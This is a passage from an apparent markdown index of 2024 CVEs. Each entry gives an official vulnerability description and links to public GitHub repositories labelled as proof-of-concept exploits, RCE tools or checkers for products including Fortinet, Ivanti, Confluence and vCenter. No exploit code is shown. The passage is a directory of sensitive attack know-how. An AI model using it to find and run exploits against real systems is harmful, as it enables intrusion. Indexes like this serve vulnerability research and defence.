[zhangguanzhang/CVE-2024-21626](https://github.com/zhangguanzhang/CVE-2024-21626) +- [laysakura/CVE-2024-21626-demo](https://github.com/laysakura/CVE-2024-21626-demo) +- [V0WKeep3r/CVE-2024-21626-runcPOC](https://github.com/V0WKeep3r/CVE-2024-21626-runcPOC) +- [abian2/CVE-2024-21626](https://github.com/abian2/CVE-2024-21626) +- [Sk3pper/CVE-2024-21626](https://github.com/Sk3pper/CVE-2024-21626) +- [KubernetesBachelor/CVE-2024-21626](https://github.com/KubernetesBachelor/CVE-2024-21626) +- [dorser/cve-2024-21626](https://github.com/dorser/cve-2024-21626) +- [FlojBoj/CVE-2024-21626](https://github.com/FlojBoj/CVE-2024-21626) +- [Sk3pper/CVE-2024-21626-old-docker-versions](https://github.com/Sk3pper/CVE-2024-21626-old-docker-versions) +- [adaammmeeee/little-joke](https://github.com/adaammmeeee/little-joke) + +### CVE-2024-21633 (2024-01-03) + +Apktool is a tool for reverse engineering Android APK files. In versions 2.9.1 and prior, Apktool infers resource files' output path according to their resource names which can be manipulated by attacker to place files at desired location on the system Apktool runs on. Affected environments are those in which an attacker may write/overwrite any file that user has write access, and either user name is known or cwd is under user folder. Commit d348c43b24a9de350ff6e5bd610545a10c1fc712 contains a patch for this issue. + + +- [0x33c0unt/CVE-2024-21633](https://github.com/0x33c0unt/CVE-2024-21633) + +### CVE-2024-21644 (2024-01-08) + +pyLoad is the free and open-source Download Manager written in pure Python. Any unauthenticated user can browse to a specific URL to expose the Flask config, including the `SECRET_KEY` variable. This issue has been patched in version 0.5.0b3.dev77. + + +- [ltranquility/CVE-2024-21644-Poc](https://github.com/ltranquility/CVE-2024-21644-Poc) + +### CVE-2024-21683 +- [r00t7oo2jm/-CVE-2024-21683-RCE-in-Confluence-Data-Center-and-Server](https://github.com/r00t7oo2jm/-CVE-2024-21683-RCE-in-Confluence-Data-Center-and-Server) +- [W01fh4cker/CVE-2024-21683-RCE](https://github.com/W01fh4cker/CVE-2024-21683-RCE) +- [absholi7ly/-CVE-2024-21683-RCE-in-Confluence-Data-Center-and-Server](https://github.com/absholi7ly/-CVE-2024-21683-RCE-in-Confluence-Data-Center-and-Server) +- [phucrio/CVE-2024-21683-RCE](https://github.com/phucrio/CVE-2024-21683-RCE) +- [xh4vm/CVE-2024-21683](https://github.com/xh4vm/CVE-2024-21683) +- [XiaomingX/cve-2024-21683-rce](https://github.com/XiaomingX/cve-2024-21683-rce) + +### CVE-2024-21689 (2024-08-20) + +This High severity RCE (Remote Code Execution) vulnerability CVE-2024-21689  was introduced in versions 9.1.0, 9.2.0, 9.3.0, 9.4.0, 9.5.0, and 9.6.0 of Bamboo Data Center and Server.\r\n\r\nThis RCE (Remote Code Execution) vulnerability, with a CVSS Score of 7.6, allows an authenticated attacker to execute arbitrary code which has high impact to confidentiality, high impact to integrity, high impact to availability, and requires user interaction.\r\n\r\nAtlassian recommends that Bamboo Data Center and Server customers upgrade to latest version, if you are unable to do so, upgrade your instance to one of the specified supported fixed versions:\r\n Bamboo Data Center and Server 9.2: Upgrade to a release greater than or equal to 9.2.17\r\n\r\n Bamboo Data Center and Server 9.6: Upgrade to a release greater than or equal to 9.6.5\r\n\r\nSee the release notes ([https://confluence.atlassian.com/bambooreleases/bamboo-release-notes-1189793869.html]). You can download the latest version of Bamboo Data Center and Server from the download center ([https://www.atlassian.com/software/bamboo/download-archives]).\r\n\r\nThis vulnerability was reported via our Bug Bounty program. + + +- [salvadornakamura/CVE-2024-21689](https://github.com/salvadornakamura/CVE-2024-21689) + +### CVE-2024-21733 (2024-01-19) + +Generation of Error Message Containing Sensitive Information vulnerability in Apache Tomcat.This issue affects Apache Tomcat: from 8.5.7 through 8.5.63, from 9.0.0-M11 through 9.0.43.\n\nUsers are recommended to upgrade to version 8.5.64 onwards or 9.0.44 onwards, which contain a fix for the issue.\n\n + + +- [LtmThink/CVE-2024-21733](https://github.com/LtmThink/CVE-2024-21733) + +### CVE-2024-21754 (2024-06-11) + +A use of password hash with insufficient computational effort vulnerability [CWE-916] affecting FortiOS version 7.4.3 and below, 7.2 all versions, 7.0 all versions, 6.4 all versions and FortiProxy version 7.4.2 and below, 7.2 all versions, 7.0 all versions, 2.0 all versions may allow a privileged attacker with super-admin profile and CLI access to decrypting the backup file. + + +- [CyberSecuritist/CVE-2024-21754-Forti-RCE](https://github.com/CyberSecuritist/CVE-2024-21754-Forti-RCE) + +### CVE-2024-21762 (2024-02-09) + +A out-of-bounds write in Fortinet FortiOS versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.6, 7.0.0 through 7.0.13, 6.4.0 through 6.4.14, 6.2.0 through 6.2.15, 6.0.0 through 6.0.17, FortiProxy versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.8, 7.0.0 through 7.0.14, 2.0.0 through 2.0.13, 1.2.0 through 1.2.13, 1.1.0 through 1.1.6, 1.0.0 through 1.0.7 allows attacker to execute unauthorized code or commands via specifically crafted requests + + +- [BishopFox/cve-2024-21762-check](https://github.com/BishopFox/cve-2024-21762-check) +- [cleverg0d/CVE-2024-21762-Checker](https://github.com/cleverg0d/CVE-2024-21762-Checker) +- [h4x0r-dz/CVE-2024-21762](https://github.com/h4x0r-dz/CVE-2024-21762) +- [r4p3c4/CVE-2024-21762-Exploit-PoC-Fortinet-SSL-VPN-Check](https://github.com/r4p3c4/CVE-2024-21762-Exploit-PoC-Fortinet-SSL-VPN-Check) +- [d0rb/CVE-2024-21762](https://github.com/d0rb/CVE-2024-21762) +- [rdoix/cve-2024-21762-checker](https://github.com/rdoix/cve-2024-21762-checker) +- [XiaomingX/cve-2024-21762-poc](https://github.com/XiaomingX/cve-2024-21762-poc) + +### CVE-2024-21793 (2024-05-08) + +\nAn OData injection vulnerability exists in the BIG-IP Next Central Manager API (URI).  Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated. + + +- [FeatherStark/CVE-2024-21793](https://github.com/FeatherStark/CVE-2024-21793) + +### CVE-2024-21887 (2024-01-12) + +A command injection vulnerability in web components of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance. + + +- [oways/ivanti-CVE-2024-21887](https://github.com/oways/ivanti-CVE-2024-21887) +- [duy-31/CVE-2023-46805_CVE-2024-21887](https://github.com/duy-31/CVE-2023-46805_CVE-2024-21887) +- [Chocapikk/CVE-2024-21887](https://github.com/Chocapikk/CVE-2024-21887) +- [raminkarimkhani1996/CVE-2023-46805_CVE-2024-21887](https://github.com/raminkarimkhani1996/CVE-2023-46805_CVE-2024-21887) +- [seajaysec/Ivanti-Connect-Around-Scan](https://github.com/seajaysec/Ivanti-Connect-Around-Scan) +- [mickdec/CVE-2023-46805_CVE-2024-21887_scan_grouped](https://github.com/mickdec/CVE-2023-46805_CVE-2024-21887_scan_grouped) +- [tucommenceapousser/CVE-2024-21887](https://github.com/tucommenceapousser/CVE-2024-21887) + +### CVE-2024-21893 (2024-01-31) + +A server-side request forgery vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) and Ivanti Neurons for ZTA allows an attacker to access certain restricted resources without authentication. + + +- [h4x0r-dz/CVE-2024-21893.py](https://github.com/h4x0r-dz/CVE-2024-21893.py) +- [Chocapikk/CVE-2024-21893-to-CVE-2024-21887](https://github.com/Chocapikk/CVE-2024-21893-to-CVE-2024-21887) + +### CVE-2024-21978 (2024-08-05) + +Improper input validation in SEV-SNP could allow a malicious hypervisor to read or overwrite guest memory potentially leading to data leakage or data corruption. + + +- [Freax13/cve-2024-21978-poc](https://github.com/Freax13/cve-2024-21978-poc) + +### CVE-2024-21980 (2024-08-05) + +Improper restriction of write operations in SNP firmware could allow a malicious hypervisor to potentially overwrite a guest's memory or UMC seed resulting in loss of confidentiality and integrity. + + +- [Freax13/cve-2024-21980-poc](https://github.com/Freax13/cve-2024-21980-poc) + +### CVE-2024-22002 (2024-06-18) + +CORSAIR iCUE 5.9.105 with iCUE Murals on Windows allows unprivileged users to insert DLL files in the cuepkg-1.2.6 subdirectory of the installation directory. + + +- [0xkickit/iCUE_DllHijack_LPE-CVE-2024-22002](https://github.com/0xkickit/iCUE_DllHijack_LPE-CVE-2024-22002) + +### CVE-2024-22024 (2024-02-13) + +An XML external entity or XXE vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x), Ivanti Policy Secure (9.x, 22.x) and ZTA gateways which allows an attacker to access certain restricted resources without authentication. + + +- [0dteam/CVE-2024-22024](https://github.com/0dteam/CVE-2024-22024) + +### CVE-2024-22026 (2024-05-22) + +A local privilege escalation vulnerability in EPMM before 12.1.0.0 allows an authenticated local user to bypass shell restriction and execute arbitrary commands on the appliance. + + +- [securekomodo/CVE-2024-22026](https://github.com/securekomodo/CVE-2024-22026) + +### CVE-2024-22120 (2024-05-17) + +Zabbix server can perform command execution for configured scripts. After command is executed, audit entry is added to "Audit Log". Due to "clientip" field is not sanitized, it is possible to injection SQL into "clientip" and exploit time based blind SQL injection. + + +- [W01fh4cker/CVE-2024-22120-RCE](https://github.com/W01fh4cker/CVE-2024-22120-RCE) +- [isPique/CVE-2024-22120-RCE-with-gopher](https://github.com/isPique/CVE-2024-22120-RCE-with-gopher) +- [g4nkd/CVE-2024-22120-RCE-with-gopher](https://github.com/g4nkd/CVE-2024-22120-RCE-with-gopher) + +### CVE-2024-22145 (2024-05-17) + +Improper Privilege Management vulnerability in InstaWP Team InstaWP Connect allows Privilege Escalation.This issue affects InstaWP Connect: from n/a through 0.1.0.8. + + +- [RandomRobbieBF/CVE-2024-22145](https://github.com/RandomRobbieBF/CVE-2024-22145) + +### CVE-2024-22198 (2024-01-11) + +Nginx-UI is a web interface to manage Nginx configurations. It is vulnerable to arbitrary command execution by abusing the configuration settings. The `Home > Preference` page exposes a list of system settings such as `Run Mode`, `Jwt Secret`, `Node Secret` and `Terminal Start Command`. While the UI doesn't allow users to modify the `Terminal Start Command` setting, it is possible to do so by sending a request to the API. This issue may lead to authenticated remote code execution, privilege escalation, and information disclosure. This vulnerability has been patched in version 2.0.0.beta.9. + + +- [xiw1ll/CVE-2024-22198_Checker](https://github.com/xiw1ll/CVE-2024-22198_Checker) + +### CVE-2024-22243 (2024-02-23) + +Applications that use UriComponentsBuilder to parse an externally provided URL (e.g. through a query parameter) AND perform validation checks on the host of the parsed URL may be vulnerable to a open redirect https://cwe.mitre.org/data/definitions/601.html  attack or to a SSRF attack if the URL is used after passing validation checks.\n + + +- [SeanPesce/CVE-2024-22243](https://github.com/SeanPesce/CVE-2024-22243) +- [shellfeel/CVE-2024-22243-CVE-2024-22234](https://github.com/shellfeel/CVE-2024-22243-CVE-2024-22234) + +### CVE-2024-22262 (2024-04-16) + +Applications that use UriComponentsBuilder to parse an externally provided URL (e.g. through a query parameter) AND perform validation checks on the host of the parsed URL may be vulnerable to a open redirect https://cwe.mitre.org/data/definitions/601.html  attack or to a SSRF attack if the URL is used after passing validation checks.\n\nThis is the same as CVE-2024-22259 https://spring.io/security/cve-2024-22259  and CVE-2024-22243 https://spring.io/security/cve-2024-22243 , but with different input.\n\n + + +- [Performant-Labs/CVE-2024-22262](https://github.com/Performant-Labs/CVE-2024-22262) + +### CVE-2024-22263 (2024-06-19) + +Spring Cloud Data Flow is a microservices-based Streaming and Batch data processing in Cloud Foundry and Kubernetes. The Skipper server has the ability to receive upload package requests. However, due to improper sanitization for upload path, a malicious user who has access to skipper server api can use a crafted upload request to write arbitrary file to any location on file system, may even compromises the server. + + +- [securelayer7/CVE-2024-22263_Scanner](https://github.com/securelayer7/CVE-2024-22263_Scanner) + +### CVE-2024-22274 (2024-05-21) + +The vCenter Server contains an authenticated remote code execution vulnerability. A malicious actor with administrative privileges on the vCenter appliance shell may exploit this issue to run arbitrary commands on the underlying operating system. + + +- [mbadanoiu/CVE-2024-22274](https://github.com/mbadanoiu/CVE-2024-22274) +- [ninhpn1337/CVE-2024-22274](https://github.com/ninhpn1337/CVE-2024-22274) +- [l0n3m4n/CVE-2024-22274-RCE](https://github.com/l0n3m4n/CVE-2024-22274-RCE) +- [Mustafa1986/CVE-2024-22274-RCE](https://github.com/Mustafa1986/CVE-2024-22274-RCE) + +### CVE-2024-22275 (2024-05-21) + +The vCenter Server contains a partial file read vulnerability. A malicious actor with administrative privileges on the vCenter appliance shell may exploit this issue to partially read arbitrary files containing sensitive data. + + +- [mbadanoiu/CVE-2024-22275](https://github.com/mbadanoiu/CVE-2024-22275) + +### CVE-2024-22369 (2024-02-20) + +Deserialization of Untrusted Data vulnerability in Apache Camel SQL ComponentThis issue affects Apache Camel: from 3.0.0 before 3.21.4, from 3.22.0 before 3.22.1, from 4.0.0 before 4.0.4, from 4.1.0 before 4.4.0.\n\nUsers are recommended to upgrade to version 4.4.0, which fixes the issue. If users are on the 4.0.x LTS releases stream, then they are suggested to upgrade to 4.0.4. If users are on 3.x, they are suggested to move to 3.21.4 or 3.22.1\n\n + + +- [oscerd/CVE-2024-22369](https://github.com/oscerd/CVE-2024-22369) + +### CVE-2024-22393 (2024-02-22) + +Unrestricted Upload of File with Dangerous Type vulnerability in Apache Answer.This issue affects Apache Answer: through 1.2.1.\n\nPixel Flood Attack by uploading large pixel files will cause server out of memory. A logged-in user can cause such an attack by uploading an image when posting content.\nUsers are recommended to upgrade to version [1.2.5], which fixes the issue.\n\n + + +- [omranisecurity/CVE-2024-22393](https://github.com/omranisecurity/CVE-2024-22393) + +### CVE-2024-22411 (2024-01-16) + +Avo is a framework to create admin panels for Ruby on Rails apps. In Avo 3 pre12, any HTML inside text that is passed to `error` or `succeed` in an `Avo::BaseAction` subclass will be rendered directly without sanitization in the toast/notification that appears in the UI on Action completion. A malicious user could exploit this vulnerability to trigger a cross site scripting attack on an unsuspecting user. This issue has been addressed in the 3.3.0 and 2.47.0 releases of Avo. Users are advised to upgrade. + + +- [tamaloa/avo-CVE-2024-22411](https://github.com/tamaloa/avo-CVE-2024-22411) + +### CVE-2024-22416 (2024-01-17) + +pyLoad is a free and open-source Download Manager written in pure Python. The `pyload` API allows any API call to be made using GET requests. Since the session cookie is not set to `SameSite: strict`, this opens the library up to severe attack possibilities via a Cross-Site Request Forgery (CSRF) attack. As a result any API call can be made via a CSRF attack by an unauthenticated user. This issue has been addressed in release `0.5.0b3.dev78`. All users are advised to upgrade. + + +- [mindstorm38/ensimag-secu3a-cve-2024-22416](https://github.com/mindstorm38/ensimag-secu3a-cve-2024-22416) + +### CVE-2024-22514 (2024-02-06) + +An issue discovered in iSpyConnect.com Agent DVR 5.1.6.0 allows attackers to run arbitrary files by restoring a crafted backup file. + + +- [Orange-418/CVE-2024-22514-Remote-Code-Execution](https://github.com/Orange-418/CVE-2024-22514-Remote-Code-Execution) + +### CVE-2024-22515 (2024-02-06) + +Unrestricted File Upload vulnerability in iSpyConnect.com Agent DVR 5.1.6.0 allows attackers to upload arbitrary files via the upload audio component. + + +- [Orange-418/AgentDVR-5.1.6.0-File-Upload-and-Remote-Code-Execution](https://github.com/Orange-418/AgentDVR-5.1.6.0-File-Upload-and-Remote-Code-Execution) +- [Orange-418/CVE-2024-22515-File-Upload-Vulnerability](https://github.com/Orange-418/CVE-2024-22515-File-Upload-Vulnerability) + +### CVE-2024-22526 (2024-04-12) + +Buffer Overflow vulnerability in bandisoft bandiview v7.0, allows local attackers to cause a denial of service (DoS) via exr image file. + + +- [200101WhoAmI/CVE-2024-22526](https://github.com/200101WhoAmI/CVE-2024-22526) + +### CVE-2024-22532 (2024-02-28) + +Buffer Overflow vulnerability in XNSoft NConvert 7.163 (for Windows x86) allows attackers to cause a denial of service via crafted xwd file. + + +- [pwndorei/CVE-2024-22532](https://github.com/pwndorei/CVE-2024-22532) + +### CVE-2024-22534 +- [austino2000/CVE-2024-22534](https://github.com/austino2000/CVE-2024-22534) + +### CVE-2024-22640 (2024-04-19) + +TCPDF version <=6.6.5 is vulnerable to ReDoS (Regular Expression Denial of Service) if parsing an untrusted HTML page with a crafted color. + + +- [zunak/CVE-2024-22640](https://github.com/zunak/CVE-2024-22640) + +### CVE-2024-22641 (-) + +TCPDF version 6.6.5 and before is vulnerable to ReDoS (Regular Expression Denial of Service) if parsing an untrusted SVG file. + + +- [zunak/CVE-2024-22641](https://github.com/zunak/CVE-2024-22641) + +### CVE-2024-22734 (2024-04-12) + +An issue was discovered in AMCS Group Trux Waste Management Software before version 7.19.0018.26912, allows local attackers to obtain sensitive information via a static, hard-coded AES Key-IV pair in the TxUtilities.dll and TruxUser.cfg components. + + +- [securekomodo/CVE-2024-22734](https://github.com/securekomodo/CVE-2024-22734) + +### CVE-2024-22752 (2024-03-07) + +Insecure permissions issue in EaseUS MobiMover 6.0.5 Build 21620 allows attackers to gain escalated privileges via use of crafted executable launched from the application installation directory. + + +- [hacker625/CVE-2024-22752](https://github.com/hacker625/CVE-2024-22752) + +### CVE-2024-22774 (-) + +An issue in Panoramic Corporation Digital Imaging Software v.9.1.2.7600 allows a local attacker to escalate privileges via the ccsservice.exe component. + + +- [Gray-0men/CVE-2024-22774](https://github.com/Gray-0men/CVE-2024-22774) + +### CVE-2024-22853 (2024-02-06) + +D-LINK Go-RT-AC750 GORTAC750_A1_FW_v101b03 has a hardcoded password for the Alphanetworks account, which allows remote attackers to obtain root access via a telnet session. + + +- [FaLLenSKiLL1/CVE-2024-22853](https://github.com/FaLLenSKiLL1/CVE-2024-22853) + +### CVE-2024-22867 +- [brandon-t-elliott/CVE-2024-22867](https://github.com/brandon-t-elliott/CVE-2024-22867) + +### CVE-2024-22889 (2024-03-05) + +Due to incorrect access control in Plone version v6.0.9, remote attackers can view and list all files hosted on the website via sending a crafted request. + + +- [shenhav12/CVE-2024-22889-Plone-v6.0.9](https://github.com/shenhav12/CVE-2024-22889-Plone-v6.0.9) + +### CVE-2024-22890 +- [BurakSevben/CVE-2024-22890](https://github.com/BurakSevben/CVE-2024-22890) + +### CVE-2024-22891 (2024-03-01) + +Nteract v.0.28.0 was discovered to contain a remote code execution (RCE) vulnerability via the Markdown link. + + +- [EQSTLab/CVE-2024-22891](https://github.com/EQSTLab/CVE-2024-22891) + +### CVE-2024-22894 (2024-01-30) + +An issue fixed in AIT-Deutschland Alpha Innotec Heatpumps V2.88.3 or later, V3.89.0 or later, V4.81.3 or later and Novelan Heatpumps V2.88.3 or later, V3.89.0 or later, V4.81.3 or later, allows remote attackers to execute arbitrary code via the password component in the shadow file. + + +- [Jaarden/CVE-2024-22894](https://github.com/Jaarden/CVE-2024-22894) + +### CVE-2024-22899 (2024-02-02) + +Vinchin Backup & Recovery v7.2 was discovered to contain an authenticated remote code execution (RCE) vulnerability via the syncNtpTime function. + + +- [Chocapikk/CVE-2024-22899-to-22903-ExploitChain](https://github.com/Chocapikk/CVE-2024-22899-to-22903-ExploitChain) + +### CVE-2024-22909 +- [BurakSevben/CVE-2024-22909](https://github.com/BurakSevben/CVE-2024-22909) + +### CVE-2024-22922 (2024-01-25) + +An issue in Projectworlds Vistor Management Systemin PHP v.1.0 allows a remtoe attacker to escalate privileges via a crafted script to the login page in the POST/index.php + + +- [keru6k/CVE-2024-22922](https://github.com/keru6k/CVE-2024-22922) + +### CVE-2024-22939 (2024-02-01) + +Cross Site Request Forgery vulnerability in FlyCms v.1.0 allows a remote attacker to execute arbitrary code via the system/article/category_edit component. + + +- [NUDTTAN91/CVE-2024-22939](https://github.com/NUDTTAN91/CVE-2024-22939) + +### CVE-2024-22983 (2024-02-28) + +SQL injection vulnerability in Projectworlds Visitor Management System in PHP v.1.0 allows a remote attacker to escalate privileges via the name parameter in the myform.php endpoint. + + +- [keru6k/CVE-2024-22983](https://github.com/keru6k/CVE-2024-22983) + +### CVE-2024-23002 +- [xiaomaoxxx/CVE-2024-23002](https://github.com/xiaomaoxxx/CVE-2024-23002) + +### CVE-2024-23108 (2024-02-05) + +An improper neutralization of special elements used in an os command ('os command injection') in Fortinet FortiSIEM version 7.1.0 through 7.1.1 and 7.0.0 through 7.0.2 and 6.7.0 through 6.7.8 and 6.6.0 through 6.6.3 and 6.5.0 through 6.5.2 and 6.4.0 through 6.4.2 allows attacker to execute unauthorized code or commands via via crafted API requests. + + +- [horizon3ai/CVE-2024-23108](https://github.com/horizon3ai/CVE-2024-23108) +- [hitem/CVE-2024-23108](https://github.com/hitem/CVE-2024-23108) + +### CVE-2024-23113 (2024-02-15) + +A use of externally-controlled format string in Fortinet FortiOS versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.6, 7.0.0 through 7.0.13, FortiProxy versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.8, 7.0.0 through 7.0.14, FortiPAM versions 1.2.0, 1.1.0 through 1.1.2, 1.0.0 through 1.0.3, FortiSwitchManager versions 7.2.0 through 7.2.3, 7.0.0 through 7.0.3 allows attacker to execute unauthorized code or commands via specially crafted packets. + + +- [OxLmahdi/cve-2024-23113](https://github.com/OxLmahdi/cve-2024-23113) +- [CheckCve2/CVE-2024-23113](https://github.com/CheckCve2/CVE-2024-23113) +- [p33d/CVE-2024-23113](https://github.com/p33d/CVE-2024-23113) +- [puckiestyle/CVE-2024-23113](https://github.com/puckiestyle/CVE-2024-23113) +- [expl0itsecurity/CVE-2024-23113](https://github.com/expl0itsecurity/CVE-2024-23113) +- [XiaomingX/cve-2024-23113-exp](https://github.com/XiaomingX/cve-2024-23113-exp) +- [XiaomingX/cve-2024-23113-poc](https://github.com/XiaomingX/cve-2024-23113-poc) + +### CVE-2024-23208 (2024-01-23) + +The issue was addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.3, watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3. An app may be able to execute arbitrary code with kernel privileges. + + +- [hrtowii/CVE-2024-23208-test](https://github.com/hrtowii/CVE-2024-23208-test) + +### CVE-2024-23298 (2024-03-15) + +A logic issue was addressed with improved state management. + + +- [p1tsi/CVE-2024-23298.app](https://github.com/p1tsi/CVE-2024-23298.app) + +### CVE-2024-23334 (2024-01-29) + +aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. When using aiohttp as a web server and configuring static routes, it is necessary to specify the root path for static files. Additionally, the option 'follow_symlinks' can be used to determine whether to follow symbolic links outside the static root directory. When 'follow_symlinks' is set to True, there is no validation to check if reading a file is within the root directory. This can lead to directory traversal vulnerabilities, resulting in unauthorized access to arbitrary files on the system, even when symlinks are not present. Disabling follow_symlinks and using a reverse proxy are encouraged mitigations. Version 3.9.2 fixes this issue. + + +- [ox1111/CVE-2024-23334](https://github.com/ox1111/CVE-2024-23334) +- [sxyrxyy/aiohttp-exploit-CVE-2024-23334-certstream](https://github.com/sxyrxyy/aiohttp-exploit-CVE-2024-23334-certstream) +- [z3rObyte/CVE-2024-23334-PoC](https://github.com/z3rObyte/CVE-2024-23334-PoC) +- [jhonnybonny/CVE-2024-23334](https://github.com/jhonnybonny/CVE-2024-23334) +- [brian-edgar-re/poc-cve-2024-23334](https://github.com/brian-edgar-re/poc-cve-2024-23334) +- [binaryninja/CVE-2024-23334](https://github.com/binaryninja/CVE-2024-23334) +- [s4botai/CVE-2024-23334-PoC](https://github.com/s4botai/CVE-2024-23334-PoC) +- [wizarddos/CVE-2024-23334](https://github.com/wizarddos/CVE-2024-23334) +- [Pylonet/CVE-2024-23334](https://github.com/Pylonet/CVE-2024-23334) +- [Arc4he/CVE-2024-23334-PoC](https://github.com/Arc4he/CVE-2024-23334-PoC) +- [TheRedP4nther/LFI-aiohttp-CVE-2024-23334-PoC](https://github.com/TheRedP4nther/LFI-aiohttp-CVE-2024-23334-PoC) +- [Betan423/CVE-2024-23334-PoC](https://github.com/Betan423/CVE-2024-23334-PoC) +- [BestDevOfc/CVE-2024-23334-PoC](https://github.com/BestDevOfc/CVE-2024-23334-PoC) + +### CVE-2024-23339 (2024-01-22) + +hoolock is a suite of lightweight utilities designed to maintain a small footprint when bundled. Starting in version 2.0.0 and prior to version 2.2.1, utility functions related to object paths (`get`, `set`, and `update`) did not block attempts to access or alter object prototypes. Starting in version 2.2.1, the `get`, `set` and `update` functions throw a `TypeError` when a user attempts to access or alter inherited properties. + + +- [200101WhoAmI/CVE-2024-23339](https://github.com/200101WhoAmI/CVE-2024-23339) + +### CVE-2024-23346 (2024-02-21) + +Pymatgen (Python Materials Genomics) is an open-source Python library for materials analysis. A critical security vulnerability exists in the `JonesFaithfulTransformation.from_transformation_str()` method within the `pymatgen` library prior to version 2024.2.20. This method insecurely utilizes `eval()` for processing input, enabling execution of arbitrary code when parsing untrusted input. Version 2024.2.20 fixes this issue. + + +- [9carlo6/CVE-2024-23346](https://github.com/9carlo6/CVE-2024-23346) +- [MAWK0235/CVE-2024-23346](https://github.com/MAWK0235/CVE-2024-23346) + +### CVE-2024-23443 (2024-06-19) + +A high-privileged user, allowed to create custom osquery packs 17 could affect the availability of Kibana by uploading a maliciously crafted osquery pack. + + +- [zhazhalove/osquery_cve-2024-23443](https://github.com/zhazhalove/osquery_cve-2024-23443) + +### CVE-2024-23652 (2024-01-31) + +BuildKit is a toolkit for converting source code to build artifacts in an efficient, expressive and repeatable manner. A malicious BuildKit frontend or Dockerfile using RUN --mount could trick the feature that removes empty files created for the mountpoints into removing a file outside the container, from the host system. The issue has been fixed in v0.12.5. Workarounds include avoiding using BuildKit frontends from an untrusted source or building an untrusted Dockerfile containing RUN --mount feature. + + +- [abian2/CVE-2024-23652](https://github.com/abian2/CVE-2024-23652) + +### CVE-2024-23653 (2024-01-31) + +BuildKit is a toolkit for converting source code to build artifacts in an efficient, expressive and repeatable manner. In addition to running containers as build steps, BuildKit also provides APIs for running interactive containers based on built images. It was possible to use these APIs to ask BuildKit to run a container with elevated privileges. Normally, running such containers is only allowed if special `security.insecure` entitlement is enabled both by buildkitd configuration and allowed by the user initializing the build request. The issue has been fixed in v0.12.5 . Avoid using BuildKit frontends from untrusted sources. \n + + +- [666asd/CVE-2024-23653](https://github.com/666asd/CVE-2024-23653) + +### CVE-2024-23692 (2024-05-31) + +Rejetto HTTP File Server, up to and including version 2.3m, is vulnerable to a template injection vulnerability. This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request. As of the CVE assignment date, Rejetto HFS 2.3m is no longer supported. + + +- [k3lpi3b4nsh33/CVE-2024-23692](https://github.com/k3lpi3b4nsh33/CVE-2024-23692) +- [jakabakos/CVE-2024-23692-RCE-in-Rejetto-HFS](https://github.com/jakabakos/CVE-2024-23692-RCE-in-Rejetto-HFS) +- [vanboomqi/CVE-2024-23692](https://github.com/vanboomqi/CVE-2024-23692) +- [WanLiChangChengWanLiChang/CVE-2024-23692-RCE](https://github.com/WanLiChangChengWanLiChang/CVE-2024-23692-RCE) +- [Mr-r00t11/CVE-2024-23692](https://github.com/Mr-r00t11/CVE-2024-23692) +- [Tupler/CVE-2024-23692-exp](https://github.com/Tupler/CVE-2024-23692-exp) +- [BBD-YZZ/CVE-2024-23692](https://github.com/BBD-YZZ/CVE-2024-23692) +- [0x20c/CVE-2024-23692-EXP](https://github.com/0x20c/CVE-2024-23692-EXP) +- [pradeepboo/Rejetto-HFS-2.x-RCE-CVE-2024-23692](https://github.com/pradeepboo/Rejetto-HFS-2.x-RCE-CVE-2024-23692) +- [verylazytech/CVE-2024-23692](https://github.com/verylazytech/CVE-2024-23692) +- [XiaomingX/cve-2024-23692-poc](https://github.com/XiaomingX/cve-2024-23692-poc) +- [NingXin2002/HFS2.3_poc](https://github.com/NingXin2002/HFS2.3_poc) + +### CVE-2024-23708 (2024-05-07) + +In multiple functions of NotificationManagerService.java, there is a possible way to not show a toast message when a clipboard message has been accessed. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. + + +- [uthrasri/CVE-2024-23708](https://github.com/uthrasri/CVE-2024-23708) + +### CVE-2024-23709 (2024-05-07) + +In multiple locations, there is a possible out of bounds write due to a heap buffer overflow. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation. + + +- [AbrarKhan/external_sonivox_CVE-2024-23709](https://github.com/AbrarKhan/external_sonivox_CVE-2024-23709) + +### CVE-2024-23722 (2024-03-26) + +In Fluent Bit 2.1.8 through 2.2.1, a NULL pointer dereference can be caused via an invalid HTTP payload with the content type of x-www-form-urlencoded. It crashes and does not restart. This could result in logs not being delivered properly. + + +- [alexcote1/CVE-2024-23722-poc](https://github.com/alexcote1/CVE-2024-23722-poc) + +### CVE-2024-23727 (2024-03-28) + +The YI Smart Kami Vision com.kamivision.yismart application through 1.0.0_20231219 for Android allows a remote attacker to execute arbitrary JavaScript code via an implicit intent to the com.ants360.yicamera.activity.WebViewActivity component. + + +- [actuator/yi](https://github.com/actuator/yi) + +### CVE-2024-23738 (2024-01-28) + +An issue in Postman version 10.22 and before on macOS allows a remote attacker to execute arbitrary code via the RunAsNode and enableNodeClilnspectArguments settings. NOTE: the vendor states "we dispute the report's accuracy ... the configuration does not enable remote code execution.." + + +- [giovannipajeu1/CVE-2024-23738](https://github.com/giovannipajeu1/CVE-2024-23738) + +### CVE-2024-23739 (2024-01-28) + +An issue in Discord for macOS version 0.0.291 and before, allows remote attackers to execute arbitrary code via the RunAsNode and enableNodeClilnspectArguments settings. + + +- [giovannipajeu1/CVE-2024-23739](https://github.com/giovannipajeu1/CVE-2024-23739) + +### CVE-2024-23740 (2024-01-28) + +An issue in Kap for macOS version 3.6.0 and before, allows remote attackers to execute arbitrary code via the RunAsNode and enableNodeClilnspectArguments settings. + + +- [giovannipajeu1/CVE-2024-23740](https://github.com/giovannipajeu1/CVE-2024-23740) + +### CVE-2024-23741 (2024-01-28) + +An issue in Hyper on macOS version 3.4.1 and before, allows remote attackers to execute arbitrary code via the RunAsNode and enableNodeClilnspectArguments settings. 